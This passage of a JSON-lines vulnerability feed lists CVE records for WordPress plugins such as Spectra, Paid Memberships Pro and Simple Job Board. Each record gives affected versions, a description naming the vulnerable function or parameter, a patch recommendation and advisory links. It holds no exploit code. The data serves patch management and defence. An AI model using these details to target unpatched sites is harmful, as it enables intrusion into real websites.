version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eaf19371-7b06-45c6-bf16-6ef7dfffb175?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eaf19371-7b06-45c6-bf16-6ef7dfffb175?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182968\\\/paid-member-subscriptions\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182968\\\/paid-member-subscriptions\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4366","slug":"ultimate-addons-for-gutenberg","versionImpact":"2.13.0","versionEndExcluding":"2.13.1","description":"The Spectra \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018block_id\u2019 parameter in versions up to, and including, 2.13.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.13.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72a74483-e159-4c51-a9e0-4a128cbf72dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72a74483-e159-4c51-a9e0-4a128cbf72dd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080971\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080971\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1546","slug":"mycryptocheckout","versionEndExcluding":"2.124","description":"The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb065397-370f-4ee1-a2c8-20e4dc4415a0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb065397-370f-4ee1-a2c8-20e4dc4415a0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5239","slug":"security-malware-firewall","versionImpact":"2.120","versionEndExcluding":"2.121","description":"The Security & Malware scan by CleanTalk WordPress plugin before 2.121 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to bypass bruteforce protection.","recommendation":"Update to version 2.121, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d748f91-773b-49d6-8f68-a27d397713c3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d748f91-773b-49d6-8f68-a27d397713c3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9222","slug":"paid-member-subscriptions","versionImpact":"2.12.8","versionEndExcluding":"2.12.9","description":"The Paid Membership Subscriptions \u2013 Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.12.8. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.12.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d43235b-9c5e-4d7f-99f0-28dcab4b2a91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d43235b-9c5e-4d7f-99f0-28dcab4b2a91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-member-subscriptions\\\/tags\\\/2.12.8\\\/includes\\\/admin\\\/class-admin-payments-list-table.php#L155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-member-subscriptions\\\/tags\\\/2.12.8\\\/includes\\\/admin\\\/class-admin-payments-list-table.php#L155\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160323\\\/#file10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160323\\\/#file10\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1815","slug":"ultimate-addons-for-gutenberg","versionImpact":"2.12.8","versionEndExcluding":"2.12.9","description":"The Spectra \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Gallery block in all versions up to, and including, 2.12.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.12.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cd877e6-e000-437d-ba9f-0640350277e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cd877e6-e000-437d-ba9f-0640350277e4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075043\\\/ultimate-addons-for-gutenberg\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075043\\\/ultimate-addons-for-gutenberg\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1814","slug":"ultimate-addons-for-gutenberg","versionImpact":"2.12.8","versionEndExcluding":"2.12.9","description":"The Spectra \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Testimonial block in all versions up to, and including, 2.12.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.12.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9ed939c-dc9c-46e8-9b23-0a3e5733e8d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9ed939c-dc9c-46e8-9b23-0a3e5733e8d5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075043\\\/ultimate-addons-for-gutenberg\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075043\\\/ultimate-addons-for-gutenberg\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1279","slug":"paid-memberships-pro","versionImpact":"2.12.8","versionEndExcluding":"2.12.9","description":"The Paid Memberships Pro WordPress plugin before 2.12.9 does not prevent user with at least the contributor role from leaking other users' sensitive metadata.","recommendation":"Update to version 2.12.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4c537264-0c23-428e-9a11-7a9e74fb6b69\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4c537264-0c23-428e-9a11-7a9e74fb6b69\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0624","slug":"paid-memberships-pro","versionImpact":"2.12.7","versionEndExcluding":"2.12.8","description":"The Paid Memberships Pro \u2013 Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.7. This is due to missing or incorrect nonce validation on the pmpro_update_level_order() function. This makes it possible for unauthenticated attackers to update the order of levels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.12.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae68d083-b6e2-409b-8c91-d4eb7e62dba9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae68d083-b6e2-409b-8c91-d4eb7e62dba9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/services.php#L139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/services.php#L139\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3025164\\\/paid-memberships-pro\\\/tags\\\/2.12.8\\\/includes\\\/services.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3025164\\\/paid-memberships-pro\\\/tags\\\/2.12.8\\\/includes\\\/services.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3107","slug":"ultimate-addons-for-gutenberg","versionImpact":"2.12.6","versionEndExcluding":"2.12.7","description":"The Spectra \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Path Traversal in versions up to, and including, 2.12.6 via the get_block_default_attributes function. This allows authenticated attackers, with contributor-level permissions and above, to read the contents of any files named attributes.php on the server, which can contain sensitive information.","recommendation":"Update to version 2.12.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/110e5e67-b318-4ab2-9b4d-59aabcf7db7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/110e5e67-b318-4ab2-9b4d-59aabcf7db7c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-gutenberg\\\/trunk\\\/classes\\\/class-uagb-block-module.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-gutenberg\\\/trunk\\\/classes\\\/class-uagb-block-module.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3062684\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3062684\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6855","slug":"paid-memberships-pro","versionImpact":"2.12.5","versionEndExcluding":"2.12.6","description":"The Paid Memberships Pro \u2013 Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to unauthorized modification of membership levels created by the plugin due to an incorrectly implemented capability check in the pmpro_rest_api_get_permissions_check function in all versions up to 2.12.5 (inclusive). This makes it possible for unauthenticated attackers to change membership levels including prices.","recommendation":"Update to version 2.12.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/383c7837-e7b7-4608-9cdc-91b7dbc7f4e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/383c7837-e7b7-4608-9cdc-91b7dbc7f4e2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/rest-api.php#L528\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/rest-api.php#L528\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/rest-api.php#L997\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/rest-api.php#L997\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3011575\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/rest-api.php?contextall=1&old=2947813&old_path=%2Fpaid-memberships-pro%2Ftrunk%2Fincludes%2Frest-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3011575\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/rest-api.php?contextall=1&old=2947813&old_path=%2Fpaid-memberships-pro%2Ftrunk%2Fincludes%2Frest-api.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7982","slug":"registrations-for-the-events-calendar","versionImpact":"2.12.3","versionEndExcluding":"2.12.4","description":"The Registrations for the Events Calendar  WordPress plugin before 2.12.4 does not sanitise and escape some parameters when accepting event registrations, which could allow unauthenticated users to perform Cross-Site Scripting attacks.","recommendation":"Update to version 2.12.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d79e1e9c-980d-4974-bfbd-d87d6e28d9a6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d79e1e9c-980d-4974-bfbd-d87d6e28d9a6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6187","slug":"paid-memberships-pro","versionImpact":"2.12.3","versionEndExcluding":"2.12.4","description":"The Paid Memberships Pro plugin for WordPress is vulnerable to arbitrary file uploads to insufficient file type validation in the 'pmpro_paypalexpress_session_vars_for_user_fields' function in versions up to, and including, 2.12.3. This makes it possible for authenticated attackers with subscriber privileges or above, to upload arbitrary files on the affected site's server which may make remote code execution possible. This can be exploited if 2Checkout (deprecated since version 2.6) or PayPal Express is set as the payment method and a custom user field is added that is only visible at profile, and not visible at checkout according to its settings.","recommendation":"Update to version 2.12.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5979f2eb-2ca8-4b06-814c-c4236bb81af0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5979f2eb-2ca8-4b06-814c-c4236bb81af0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/tags\\\/2.12.3\\\/includes\\\/fields.php#L564\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/tags\\\/2.12.3\\\/includes\\\/fields.php#L564\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.paidmembershipspro.com\\\/pmpro-update-2-12-4\\\/\",\"name\":\"https:\\\/\\\/www.paidmembershipspro.com\\\/pmpro-update-2-12-4\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2997319\\\/paid-memberships-pro\\\/tags\\\/2.12.4\\\/includes\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2997319\\\/paid-memberships-pro\\\/tags\\\/2.12.4\\\/includes\\\/functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2997319\\\/paid-memberships-pro\\\/tags\\\/2.12.4\\\/includes\\\/fields.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2997319\\\/paid-memberships-pro\\\/tags\\\/2.12.4\\\/includes\\\/fields.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7351","slug":"simple-job-board","versionImpact":"2.12.3","versionEndExcluding":"2.12.4","description":"The Simple Job Board plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.12.3 via deserialization of untrusted input when editing job applications. This makes it possible for authenticated attackers, with Editor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 2.12.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba6312b9-1b66-4b4f-a78d-515fa4aab63b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba6312b9-1b66-4b4f-a78d-515fa4aab63b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3138348%40simple-job-board%2Ftrunk&old=3113171%40simple-job-board%2Ftrunk&sfp_email=&sfph_mail=#file12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3138348%40simple-job-board%2Ftrunk&old=3113171%40simple-job-board%2Ftrunk&sfp_email=&sfph_mail=#file12\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3113","slug":"simple-form","versionImpact":"2.12.1","versionEndExcluding":"2.12.2","description":"The FormFlow: WhatsApp Social and Advanced Form Builder with Easy Lead Collection WordPress plugin before 2.12.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.12.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad85c5c7-f4d1-4374-b3b7-8ee022d27d34\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad85c5c7-f4d1-4374-b3b7-8ee022d27d34\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0772","slug":"optinmonster","versionEndExcluding":"2.12.2","description":"The Popup Builder by OptinMonster WordPress plugin before 2.12.2 does not ensure that the campaign to be loaded via some shortcodes is actually a campaign, allowing any authenticated users such as subscriber to retrieve the content of arbitrary posts, like draft, private or even password protected ones.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28754886-b7b4-44f7-9042-b81c542d3c9c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28754886-b7b4-44f7-9042-b81c542d3c9c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7761","slug":"simple-job-board","versionImpact":"2.12.1","versionEndExcluding":"2.12.2","description":"In the process of testing the Simple Job Board WordPress plugin before 2.12.2, a vulnerability was found that allows you to implement Stored XSS on behalf of the editor by embedding malicious script, which entails account takeover backdoor","recommendation":"Update to version 2.12.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae8c1c91-3574-4da5-b5dc-d4e3feccac7e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae8c1c91-3574-4da5-b5dc-d4e3feccac7e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12265","slug":"depay-payments-for-woocommerce","versionImpact":"2.12.17","versionEndExcluding":"2.12.18","description":"The Web3 Crypto Payments by DePay for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the \/wp-json\/depay\/wc\/debug REST API endpoint in all versions up to, and including, 2.12.17. This makes it possible for unauthenticated attackers to retrieve debug infromation.","recommendation":"Update to version 2.12.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3205102%40depay-payments-for-woocommerce&new=3205102%40depay-payments-for-woocommerce&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3205102%40depay-payments-for-woocommerce&new=3205102%40depay-payments-for-woocommerce&sfp_email=&sfph_mail=#file2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3eb3444-de5c-4cb0-acaa-c6303fab46e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3eb3444-de5c-4cb0-acaa-c6303fab46e0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7762","slug":"simple-job-board","versionImpact":"2.12.5","versionEndExcluding":"2.12.16","description":"The Simple Job Board WordPress plugin before 2.12.6 does not prevent uploaded files from being listed, allowing unauthenticated users to access and download uploaded resumes","recommendation":"Update to version 2.12.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26403e72-c927-4649-b789-694a10ad0492\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26403e72-c927-4649-b789-694a10ad0492\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9189","slug":"eu-vat-for-woocommerce","versionImpact":"2.12.12","versionEndExcluding":"2.12.14","description":"The EU\/UK VAT Manager for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the alg_wc_eu_vat_exempt_vat_from_admin() function in all versions up to, and including, 2.12.12. This makes it possible for unauthenticated attackers to update the VAT status for any order.","recommendation":"Update to version 2.12.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6db680e-1fd4-420c-98f4-2b6dc5cf6781?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6db680e-1fd4-420c-98f4-2b6dc5cf6781?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eu-vat-for-woocommerce\\\/tags\\\/2.12.12\\\/includes\\\/class-alg-wc-eu-vat-ajax.php#L285\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eu-vat-for-woocommerce\\\/tags\\\/2.12.12\\\/includes\\\/class-alg-wc-eu-vat-ajax.php#L285\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158296\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158296\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8788","slug":"eu-vat-for-woocommerce","versionImpact":"2.12.12","versionEndExcluding":"2.12.14","description":"The EU\/UK VAT Manager for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.12.11. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.12.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/443c57bf-2f3d-4b8f-9dae-b11142a74341?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/443c57bf-2f3d-4b8f-9dae-b11142a74341?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eu-vat-for-woocommerce\\\/tags\\\/2.12.12\\\/includes\\\/admin\\\/class-alg-wc-eu-vat-admin.php#L461\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eu-vat-for-woocommerce\\\/tags\\\/2.12.12\\\/includes\\\/admin\\\/class-alg-wc-eu-vat-admin.php#L461\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158296\\\/eu-vat-for-woocommerce\\\/tags\\\/2.12.14\\\/includes\\\/admin\\\/class-alg-wc-eu-vat-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158296\\\/eu-vat-for-woocommerce\\\/tags\\\/2.12.14\\\/includes\\\/admin\\\/class-alg-wc-eu-vat-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4872","slug":"woocommerce-chained-products","versionEndExcluding":"2.12.0","description":"The Chained Products WordPress plugin before 2.12.0 does not have authorisation and CSRF checks, as well as does not ensure that the option to be updated belong to the plugin, allowing unauthenticated attackers to set arbitrary options to 'no'","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c76a1c0b-8a5b-4639-85b6-9eebc63c3aa6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c76a1c0b-8a5b-4639-85b6-9eebc63c3aa6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3766","slug":"login-lockdown","versionImpact":"2.11","versionEndExcluding":"2.12","description":"The Login Lockdown & Protection plugin for WordPress is vulnerable to unauthorized nonce access due to a missing capability check on the ajax_run_tool function in all versions up to, and including, 2.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain a valid nonce that can be used to generate a global unlock key, which can in turn be used to add arbitrary IP address to the plugin allowlist. This can only by exploited on new installations where the site administrator hasn't visited the loginlockdown page yet.","recommendation":"Update to version 2.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-lockdown\\\/trunk\\\/libs\\\/ajax.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-lockdown\\\/trunk\\\/libs\\\/ajax.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3286814\\\/login-lockdown\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3286814\\\/login-lockdown\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac9a3848-f486-475b-b2c7-ea1007bb30d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac9a3848-f486-475b-b2c7-ea1007bb30d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11758","slug":"wp-spid-italia","versionImpact":"2.9","versionEndExcluding":"2.12","description":"The WP SPID Italia plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-spid-italia\\\/trunk\\\/frontend-ui.php#L109\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-spid-italia\\\/trunk\\\/frontend-ui.php#L109\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cdadbf2-8b5d-4018-8cee-0d0fb07696f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cdadbf2-8b5d-4018-8cee-0d0fb07696f9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1290","slug":"formidable-registration","versionImpact":"2.11","versionEndExcluding":"2.12","description":"The User Registration WordPress plugin before 2.12 does not prevent users with at least the contributor role from rendering sensitive shortcodes, allowing them to generate, and leak, valid password reset URLs, which they can use to take over any accounts.","recommendation":"Update to version 2.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a60187d4-9491-435a-bc36-8dd348a1ffa3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a60187d4-9491-435a-bc36-8dd348a1ffa3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8319","slug":"tourfic","versionImpact":"2.11.20","versionEndExcluding":"2.11.21","description":"The Tourfic plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.11.20. This is due to missing or incorrect nonce validation on the tf_order_status_email_resend_function,  tf_visitor_details_edit_function, tf_checkinout_details_edit_function, tf_order_status_edit_function, tf_order_bulk_action_edit_function, tf_remove_room_order_ids, and tf_delete_old_review_fields functions. This makes it possible for unauthenticated attackers to resend order status emails, update visitor\/order details, edit check-in\/out details, edit order status, perform bulk order status updates, remove room order IDs, and delete old review fields, respectively, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.11.21, or a newer patched 